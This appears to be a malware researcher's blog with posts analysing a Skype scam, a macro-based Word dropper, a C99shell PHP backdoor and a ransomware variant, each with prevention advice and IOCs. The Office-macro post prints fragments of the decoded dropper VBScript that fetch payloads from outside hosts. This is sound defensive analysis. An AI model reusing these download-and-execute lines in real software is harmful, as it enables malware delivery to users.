Search this Blog

Loading...

Friday, July 10, 2015

Scams spreading through Skype



I got a message today on Skype to check out an eBay page with my name on. Sounds great!

Hey $name! Look http://www.ebay.com/new/$username





Another example is:






However, the link was not exactly pointing to eBay:

Not eBay, but what appears to be google.dj







Turns out the actual link behind the eBay one is pointing to:





What follows after is for tracking and to disable the Redirect notice message from Google. For those who are curious, google.dj is a legitimate website of Google for the African country Djibouti.

The what seems to be random numbers is actually just hex for:





When you click the link, you will simply do a Google search for that webpage and visit it. This does not mean google.dj is compromised in any way. As an example, you can use the same link but instead use google.com instead of google.dj.

On the lengthy site mentioned above, you'll get a Javascript which you can view on this Pastebin link:
Scams spreading through Skype
(In short, it does a simple math.random method to serve you a slightly different website each time.)



Fiddler capture






Eventually, you'll end up on a typical weight loss scam website:

Obviously not the real Women's Health website









Trying to leave the website










Long story short.....


Prevention

Install the WOT extension into your browser. (Compatible with most modern browsers)
WOT is a community-based tool and is therefore very useful for these kinds of scams, whereas other users can warn you about the validity.

Use a strong password for Skype and anything else for that matter.

Don't click on "funny" links. A trick is to "hover" on the link to reveal the actual website behind it.



Disinfection

Close your browser.

Change your Skype password immediately. How do I change my password?

If the message came from an unknown contact, How do I report abuse by someone in Skype?

If the message came from a friend, be sure to notify him/her and to follow the steps in this post.

To be sure, you can always run a scan with your favorite antivirus and/or antimalware product. (however, I have not seen any malware in this particular campaign)


Conclusion

In the past, malware has spread via Skype, but this is the first time I'm seeing a scam presented in this way. I have contacted Skype to ask how they were able to hide the actual website behind the eBay link, as I do not know - if you do, be sure to let me know in the comments.

Also, follow the steps above to stay safe.

Friday, May 29, 2015

CARO 2015 – wrap up



In May, I’ve visited the CARO workshop for the first time, representing Panda Security (not as a speaker, simply as an attendee).

What is CARO exactly? From their website:
CARO is an informal group of individuals who have been working together since around 1990 across corporate and academic borders to study the phenomenon of computer malware.

Besides meeting other people in this field, there were also a number of interesting presentations and case studies on malware as well. You can view the full program here: http://2015.caro.org/programme

In regards to the presentations, not everything is shared as malware authors are keeping themselves up-to-date as well about the latest anti-anti-evasion techniques, botnet takedown operations and whatnot. That being said, it was great to be there and seeing how great cooperation can be!

Presentations that are shared however can be found here:
http://2015.caro.org/presentations
 
Until next time!

Friday, May 8, 2015

New malicious Office docs trick


It all starts with the 1,000,000th usual spam mail in your inbox:

Have you received an order form? No.











The content is as follows:


Dear,

We have received your order form [AY19358KXN]  and we thank you very much. Our sales department informs us that they are able to dispatch your stock by the end of next week following your packing instructions.

As agreed, we have arranged transport. We are sending herewith a copy of our pro-forma invoice.

The consignment will be sent as soon as the bank informs us that the sum is available. We hope you will be satisfied with the fulfilment of this order and that it will be the beginning of a business relationship to our mutual benefit.


Attached is a DOC file with (surprise) a macro attached. However, the method's different than usual:


In the past, there have been some other new tricks as well, for example:
Analyzing an MS Word document not detected by AV software
XML: A New Vector For An Old Trick
Malware authors go a step further to access bank accounts

In regards to any Office files, you can simply open the file in Notepad++ for example and you'll see the .mso appended at the end. The new thing here is that it's a Word MHTML file with macro(s).

Using olevba (by @decalage2), we can extract and automatically decode the .mso object - which contains a bunch of (what appears to be) random gibberish:

Function that "Returns the character associated with the specified character code"






You can use the ASCII character code chart to figure out what this malware is doing exactly, for example the first line Chr$(104) & Chr$(116) & Chr$(116) & Chr$(112) is simply "HTTP".

Another option is to use a Python program made by Xavier Mertens, deobfuscate_chr.py.
You can find a Pastebin here with the extracted + deobfuscated macro.


Short analysis of this .doc file using olevba












Other tools are available as well, for example oledump and emldump from Didier Stevens.

Emldump + passing through oledump extracted a malicious link











 
Now, what happens when you execute this malicious Word file?

Oops, seems macros are disabled :)







If macros are enabled, or you choose to enable the macro in that document, a Pastebin download link was opened and the file was executed. Process flow is:

Word document -> download VBS from Pastebin -> Execute VBS -> Downloads & executes EXE file -> Downloads & executes another EXE file.

Visually, you might get either of these images:

dim JHyygUBjdfg: Set JHyygUBjdfg = createobject(Microsoft.XMLHTTP )
dim jhvHVKfdg: Set jhvHVKfdg = createobject(Adodb.Stream )
JHyygUBjdfg.Open GET , http://savepic.org/7260406.jpg
















dim sdfsdfsdf: Set sdfsdfsdf = createobject(Microsoft.XMLHTTP )
dim dsfsdfsdfg: Set dsfsdfsdfg = createobject(Adodb.Stream )
sdfsdfsdf.Open GET , http://savepic.net/6856149.jpg












Dropper, payload, related files:

AY19358KXN.doc (original file)
SHA1: b2c793b1cf2cf11954492fd52e22a3b8a96dac15
VirusTotal

Extracted macro (I named it AY.vb)
SHA1: 79b0d7a7fe917583bc4f73ce1dbffc5497b6974d
VirusTotal

JGuigbjbff3f.vbs (dropped VBscript file)
SHA1: c8a914fdc18d43aabbf84732b97676bd17dc0f54
VirusTotal
Deobfuscated VBscript

o8237423.exe (dropper)
SHA1: 7edc7afb424e6f8fc5fb5bae3681195800ca8330
VirusTotal

DInput8.dll (payload)
SHA1: 8bfe59646bdf6591fa8213b30720553d78357a99
VirusTotal





Prevention



Conclusion

It seems obvious that malware authors are keeping up-to-date with the latest news and as such adapting their campaigns as well. Better be safe than sorry and don't trust anything sent via email. ;-)

If you're in an organisation, you might want to consider blocking the execution of all macros (or only allow the ones that are digitally signed if there's really no other choice) by using GPO.

You can find those templates here:

Note: starting from Office 2010, macros are disabled by default.


Resources


Wednesday, March 4, 2015

C99Shell not dead


I recently got contacted on Twitter in regards to a hacked webpage:



After I received the files two things became apparent:

- the webserver (and thus the website) was infected with C99shell
- the webserver was infected with other PHP backdoors

PHP/c99shell or simply c99shell should be well known by now - it is a PHP backdoor that provides a lot of functionality, for example:

- download/upload files from and to the server (FTP functionality)
- run shell commands
- full access to all files on the hard disk
- ...

In short, it can pretty much do everything you want, which results in end-users getting malware onto their systems and/or data getting stolen and/or personal information compromised.

There's an excellent blog post over at Malwaremustdie in regards to C99shell, you can read it here:
How EVIL the PHP/C99Shell can be? From SQL Dumper, Hacktools, to Trojan Distributor Future?


Now, here's one of the files gathered from the webserver:




It's heavily obfuscated as one would expect; after some deobfuscating/decoding we get:




It also has a nice web interface:









Seems like we are dealing with a slightly updated version of C99shell, version 2.1:








And last but not least, some functionality:














You can find the decoded C99shell backdoor on Pastebin:
Decoded PHP/c99shell

Detections aren't too great for this PHP backdoor, but it surely has improved since Malwaremustdie started blogging about it, some VirusTotal results: 0, 1, 2.


As I mentioned before, other PHP backdoors were present, for example:








After some manual decoding, we turn up with the following interesting line:
getenv(HTTP_X_UP_CALLING_LINE_ID);

Another example:
getenv(HTTP_X_NOKIA_ALIAS);

The "x-headers" HTTP_X_UP_CALLING_LINE_ID and HTTP_X_NOKIA_ALIAS are actually part of WML, the Wireless Markup Language.

Thus, this PHP backdoor seems specifically designed to target mobile users. I've put a copy of the script in screenshot above on Pastebin as well:
Unknown PHP backdoor

Darryl from Kahu Security has written an excellent post on how to manually decode this kind of PHP obfuscation: Deobfuscating a Wicked-Looking Script

If you have any information on what kind of PHP backdoor this might be (if not generic), feel free to let me know.



Prevention

This shouldn't be repeated normally, but I will again just for good measure:

  • Take back-ups regularly! Yes, even for your website.
  • Keep your CMS up-to-date; whether you use WordPress, Joomla, Drupal, ... 
  • Keep your installed plugins up-to-date. Remove any unnecessary plugins.
  • Use strong passwords for your FTP account(s), as well as for your CMS/admin panel login.
  • Use appropriate file permissions - meaning don't use 777 everywhere. (seriously, don't)
  • Depending on how you manage your website - keep your operating system up-to-date and, if applicable, install and update antivirus software.
More (extended) tips can be found over at StopBadware:
Preventing badware: Basics

There are also guides available on how to harden your specific CMS installation, for example:
WordPress: Hardening WordPress
Joomla: Security Checklist/Joomla! Setup
Drupal: Writing secure code


Disinfection

What if your website's already been hacked and serving up malware to the unknowing visitor? Best practice is to simply take your website offline and restore from an earlier back-up. (don't forget to verify if your back-up isn't infected as well)

If that's not a possibility for whatever reason, you'll first need to find where any malicious code was injected (or created) on your website, or how it was infected in the first place.

An easy way would be to simply check all recently changed files on your web server. However, those dates can be altered. So what's a better alternative? You can comb over the files one by one, or you can use an online tool to check your website.

A short overview:

http://sitecheck.sucuri.net/
You can use Sucuri's SiteCheck to quickly spot if they detect any malware, see if you're blacklisted and, the most useful part in this case is to check whether or not you have any outdated plugin or CMS running - as well as a list of links.

http://aw-snap.info/file-viewer/
Use Redleg's file viewer to easily see if any malicious iframes have been injected - you can even choose which Referrer and User Agent should be used (some malware requires you to visit the site via a specific Referrer or User Agent).

http://www.rexswain.com/httpview.html
Useful additional tool to Redleg's file viewer. Allows you to only fetch headers of a website, or fetch both header and content.

http://jsunpack.jeek.org/
Excellent tool in case any malicious Javascript (iframe) is injected into any of your web server files. Less intuitive, but provides a great overview.

http://urlquery.net/
Excellent tool and more graphical as opposed to JSunpack - especially useful is to see if any IDS was triggered as well as JavaScript and HTTP Transactions.

https://www.virustotal.com/
As usual, VirusTotal is a great resource as well - it can pinpoint which Antivirus (if any) is triggering an alert related to your website.

If nothing is found, but you are still receiving reports from either blacklists (eg. Google) or users, you'll have to manually go over all your files to see if any code was attached. Another method (and obviously not foolproof) is to copy over all your files to a Windows system and scan them with an antivirus. I think you're starting to realize why back-ups are important.

If you had any outdated plugins running, chances are very high the backdoor or script was created/added in that specific directory. For example for WordPress this is typically:
/www/wp-content/plugins/

You can also install a plugin for your CMS which can scan your web server for any infected files. (Which is ironic, but might still do the trick should you not be able to find anything manually.)

Last but not least: check your access logs! See any unauthorized (FTP) logins for example? Contact your hosting provider - they might be able to assist you as well.

If you're still stuck, feel free to shoot me an email or contact me on Twitter. Otherwise, contact one of X companies which can help you assist in clean-up.

Don't forget: after clean-up, reset all your passwords (and don't use the same for everything) and follow the prevention tips above, or you'll simply get infected again.



Conclusion

C99shell is obviously not dead and neither are other PHP backdoors - or any other malware for that matter. Securing your website is not only beneficial for you, but also for your customers and other visitors. This blog post should have provided you with the essentials on securing your website and cleaning it up should it ever be infected (repeating: best practice is to take it offline and restore from a back-up).




Resources

For webmasters:
StopBadware - My site has badware
Google - If your site is infected
Redleg - If you're having redirects (Google says my site is redirecting to a malicious or spam site.)

For researchers:
Online JavaScript Beautifier - http://jsbeautifier.org/
PHP Formatter - http://beta.phpformatter.com/
Kahu Security tools - http://www.kahusecurity.com/tools/
(for this specific blog post, PHP Converter is a must-use and very effective tool)
Base 64 Decoder - http://www.opinionatedgeek.com/dotnet/tools/Base64Decode/

Above list is obviously my own personal flavor, feel free to leave a comment with your favorite tool.

Friday, February 13, 2015

Yet another ransomware variant


The blog post of today is a bit different than usual, as you can read the full post on the Panda Security blog. Read it here: Yet another ransomware variant

In this post I'm simply adding some additional information and repeating the most important points.

So, there's yet another ransomware variant on the loose. You may call this one Chuingam (chewing gum?) ransomware or Xwin ransomware - pointing to respectively the file with this string 'Chuingam' dropped, or in the latter case the folder on C:\ it creates. Or just another (skiddie) Generic Ransomware.

In the blog post above, I discuss the methodology to encrypt files it uses and how it creates your own personal key, as well as the ransom message and how to recover files (if you're lucky & fast enough).

pgp.exe (PGP) is used to generate the public RSA key. Since pgp.exe requires the RAR password, this is temporarily stored in the file "filepas.tmp" - which is overwritten and deleted, so no chance to recover this file.
 

process flow graph of pgp.exe (made using procDOT)





















As a note; it will (try to) encrypt any and all files with the following extensions:
jpg, jpeg, doc, txt, pdf, tif, dbf, eps, psd, cdr, tst,  MBD, xml,  xls, dwg, mdf, mdb, zip, rar, cdx, docx, wps, rtf, 1CD, 4db, 4dd, adp, ADP, xld, wdb, str, pdm, itdb, pst, ptx, dxg, ppt, pptx

If you've been infected with this ransomware, best thing to do is to either restore from a backup or try to restore previous files (also known as shadow copies).

For additional information in regards to this specific ransomware, refer to:
Yet another ransomware variant

For any further background information on ransomware or further prevention & disinfection advice, I refer to my Q&A on ransomware.





IOCs
Hashes (SHA1)
88039ecb68749ea7d713e4cf9950ffb2947f7683
7e1dd704684f01530307f81bbdc15fe266ffd8db

Domains/IPs
corplawersp.com
5.63.154.90